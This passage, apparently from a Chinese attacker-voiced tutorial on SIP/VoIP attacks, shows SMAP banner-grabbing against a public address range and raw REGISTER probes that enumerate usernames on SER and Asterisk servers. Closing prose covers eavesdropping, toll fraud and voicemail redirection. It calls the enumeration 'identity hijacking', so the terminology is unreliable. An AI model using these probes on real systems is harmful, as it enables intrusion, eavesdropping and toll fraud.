在这里，首先我们一定要掌握SIP banner-grabbing的技巧，SMAP可以执行SIP的搜索功能：
$ ./smap -o 89.53.17.208/29
smap 0.4.0-cvs <hscholz@raisdorf.net>http://www.wormulon.net/
Host 89.53.17.208:5060: (ICMP OK) SIP timeout
Host 89.53.17.209:5060: (ICMP OK) SIP enabled
AVM FRITZ!Box Fon Series firmware: 14.03.(89|90) (Oct 28 2005)
Host 89.53.17.210:5060: (ICMP timeout) SIP timeout
Host 89.53.17.211:5060: (ICMP OK) SIP enabled
AVM FRITZ!Box Fon Series firmware: 14.03.(89|90) (Oct 28 2005)
Host 89.53.17.212:5060: (ICMP OK) SIP enabled
AVM FRITZ!Box Fon Series firmware: 14.03.(89|90) (Oct 28 2005)
Host 89.53.17.213:5060: (ICMP timeout) SIP enabled
Siemens SX541 (firmware 1.67)
Host 89.53.17.214:5060: (ICMP OK) SIP enabled
AVM FRITZ!Box Fon Series firmware: 14.03.(89|90) (Oct 28 2005)
Host 89.53.17.215:5060: (ICMP OK) SIP enabled
AVM FRITZ!Box Fon ata 11.03.45
8 hosts scanned, 6 ICMP reachable, 6 SIP enabled
$
对于SIP的攻击，我主要讲一下Registration hijacking方式中的Identity Theft（身份挟持）。公共运营商在VoIP部署环境的身份和端点验证方面所面临的挑战比PSTN和网状网络运营商来说严峻的多，原因就在于，端点的 IP地址在因特网入口点（ingress point）通常不会加以验证，而且不像公共电话号码，目前还没有一个有效的广泛应用的方法可供VoIP运营商证明SIP身份。于是典型的整合通讯协定寄存器呼叫从一个电话到一个注册服务器或代理流过。
当SIP EXpress Router 是192.168.1.104时，我们来看这个例子：
Sent to 192.168.1.104:
REGISTER sip:192.168.1.104 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.120:5060;rport;branch=z9hG4bK9AE42E04481647949E19
C9C281BD7CDC
From: 506 <sip:506@192.168.1.104>;tag=120975822
To: 506 <sip:506@192.168.1.104>
Contact: "506" <sip:506@192.168.1.120:5060>
Call-ID: 9F7F6FB9AFFA47278BE3CB571B3744D9@192.168.1.104
CSeq: 54512 REGISTER
Expires: 1800
Max-Forwards: 70
User-Agent: X-Lite release 1105x
Content-Length: 0

Received from 192.168.1.104:
SIP/2.0 401 Unauthorized
Via: SIP/2.0/UDP 192.168.1.120:5060;rport=5060;branch=z9hG4bK9AE42E044816479
49E19C9C281BD7CDC
From: 506 <sip:506@192.168.1.104>;tag=120975822
To: 506 <sip:506@192.168.1.104>;tag=b27e1a1d33761e85846fc98f5f3a7e58.bdc9
Call-ID: 9F7F6FB9AFFA47278BE3CB571B3744D9@192.168.1.104
CSeq: 54512 REGISTER
WWW-Authenticate: Digest realm="domain2", nonce="440bcbe24670d5d0448fd78ec4b
672a3c29de346"
Server: Sip EXpress router (0.9.6 (i386/linux))
Content-Length: 0
Warning: 392 192.168.1.104:5060 "Noisy feedback tells: pid=29785
req_src_ip=192.168.1.120 req_src_port=5060 in_uri=sip:192.168.1.104
out_uri=sip:192.168.1.104 via_cnt==1"
// 在这里我们收到了预期的401 SIP 响应，那么我们接下来换一个错误的用户名进行挟持
Sent to 192.168.1.104
REGISTER sip:thisisthecanary@192.168.1.104 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.120:2174;branch=el7mCh5QhC6WNg
From: test <sip:thisisthecanary@192.168.1.104>;tag=vkffYiKFjn
To: test <sip:thisisthecanary@192.168.1.104>
Call-ID: AXy1SAVzvwd9@192.168.1.120
CSeq: 1 REGISTER
Contact: <sip:test@192.168.1.120:2174>
Max_forwards: 70
User Agent: SIPSCAN 1.0
Content-Type: application/sdp
Subject: SIPSCAN Probe
Expires: 7200
Content-Length: 0

Received from 192.168.1.104:
SIP/2.0 401 Unauthorized
Via: SIP/2.0/UDP 192.168.1.120:2174;branch=el7mCh5QhC6WNg
From: test <sip:thisisthecanary@192.168.1.104>;tag=vkffYiKFjn
To: test <sip:thisisthecanary@192.168.1.104>;tag=b27e1a1d33761e85846fc98f5f3
a7e58.b11e
Call-ID: AXy1SAVzvwd9@192.168.1.120
CSeq: 1 REGISTER
WWW-Authenticate: Digest realm="domain2",
nonce="440bc944e0e0dc62d7185d035576505481d9dd34"
Server: Sip EXpress router (0.9.6 (i386/linux))
Content-Length: 0
Warning: 392 192.168.1.104:5060 "Noisy feedback tells: pid=29782
req_src_ip=192.168.1.120 req_src_port=2174
in_uri=sip:thisisthecanary@192.168.1.104
out_uri=sip:thisisthecanary@192.168.1.104 via_cnt==1"
// thisisthecanary这个用户名成功收到了之前的401 SIP 响应，下面我们发给Asterisk服务器(192.168.1.103)同样的请求
Sent to 192.168.1.103
REGISTER sip:192.168.1.103 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.21:2051;branch=z9hG4bK-v7brim4vvk49;rport
From: "Snom 320" <sip:201@192.168.1.103>;tag=e35li4iydd
To: "Snom 320" <sip:201@192.168.1.103>
Call-ID: 3c2670092710-g9u6jfnehewi@snom320
CSeq: 1 REGISTER
Max-Forwards: 70
Contact: <sip:201@192.168.1.21:2051;line=ylcbbss9>;q=1.0;+sip.instance=
"<urn:uuid:bf9b2fe3-b95c-4cfd-96ad-5b52bf1d0c2a>"
;audio;mobility="fixed";duplex="full";description="snom320";actor=
"principal";events="dialog";methods=
"INVITE,ACK,CANCEL,BYE,REFER,OPTIONS,NOTIFY,SUBSCRIBE,PRACK,MESSAGE,INFO"
User-Agent: snom320/4.1
Supported: gruu
Allow-Events: dialog
X-Real-IP: 192.168.1.21
WWW-Contact: <http://192.168.1.21:80>;
WWW-Contact: <https://192.168.1.21:443>
Expires: 3600
Content-Length: 0

Received from: 192.168.1.103
SIP/2.0 401 Unauthorized
Via: SIP/2.0/UDP 192.168.1.21:2051;branch=z9hG4bK-v7brim4vvk49
From: "Snom 320" <sip:201@192.168.1.103>;tag=e35li4iydd
To: "Snom 320" <sip:201@192.168.1.103>;tag=as356abebc
Call-ID: 3c2670092bf2-g9u6jfnehewi@snom320
CSeq: 1 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER
Contact: <sip:201@192.168.1.103>
WWW-Authenticate: Digest realm="asterisk", nonce="38e8e429"
//` 错误用户名thisisthecanary进行挟持Asterisk服务器
REGISTER sip:thisisthecanary@192.168.1.103 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.120:2219;branch=el7mCh5QhC6WNg
From: test <sip:thisisthecanary@192.168.1.103>;tag=vkffYiKFjn
To: test <sip:thisisthecanary@192.168.1.103>
Call-ID: AXy1SAVzvwd9@192.168.1.120
CSeq: 1 REGISTER
Contact: <sip:test@192.168.1.120:2219>
Max_forwards: 70
User Agent: SIPSCAN 1.0
Content-Type: application/sdp
Subject: SIPSCAN Probe
Expires: 7200
Content-Length: 0

Received from 192.168.1.103:
SIP/2.0 403 Forbidden
Via: SIP/2.0/UDP 192.168.1.120:2219;branch=el7mCh5QhC6WNg
From: test <sip:thisisthecanary@192.168.1.103>;tag=vkffYiKFjn
To: test <sip:thisisthecanary@192.168.1.103>;tag=as44107711
Call-ID: AXy1SAVzvwd9@192.168.1.120
CSeq: 1 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER
Contact: <sip:thisisthecanary@192.168.1.103>
Content-Length: 0
        到这里，可以发现在错误的用户名下，我们收到了禁用的403 SIP 响应，而不是REGISTER正确的401响应。向VoIP目标服务器发送大量的SIP呼叫信令消息（如Invite、Register、Bye或者RTP媒体流数据包）会导致服务降级，迫使呼叫过早丢失、导致某些VoIP设备完全无法处理呼叫，这种身份挟持方式比较普遍。

如今，SIP和RTP协议并不对呼叫信令数据包和语音流进行加密，所以只要使用局域网和无线局域网流量搜集工具（嗅探器），就能够获取呼叫方的身份、证书和SIP统一资源标识符（电话号码）。利用漏洞可以发起各种类型的攻击。比如一旦网关被我们攻破，IP电话不用经过认证就可随意拨打，攻击者可以使用获取的账户信息向客户代表或者自助服务门户网站假冒用户，然后他可以更改呼叫计划，允许呼叫900号码或者呼叫原先封锁的国际号码。未经保护的语音通话有可能遭到拦截和窃听，而且可以被随时截断。我们利用重定向攻击可以把语音邮件地址替换成自己指定的特定IP地址，为自己打开秘密通道和后门。而最典型的是，我们可以骗过SIP和IP地址的限制而窃取到整个谈话过程，还可以访问语音邮件，或者更改呼叫转移号码。出于经济目的的攻击者还能够获取语音通话，然后重新播放，从而获得敏感的商业或者私人信息。

太多了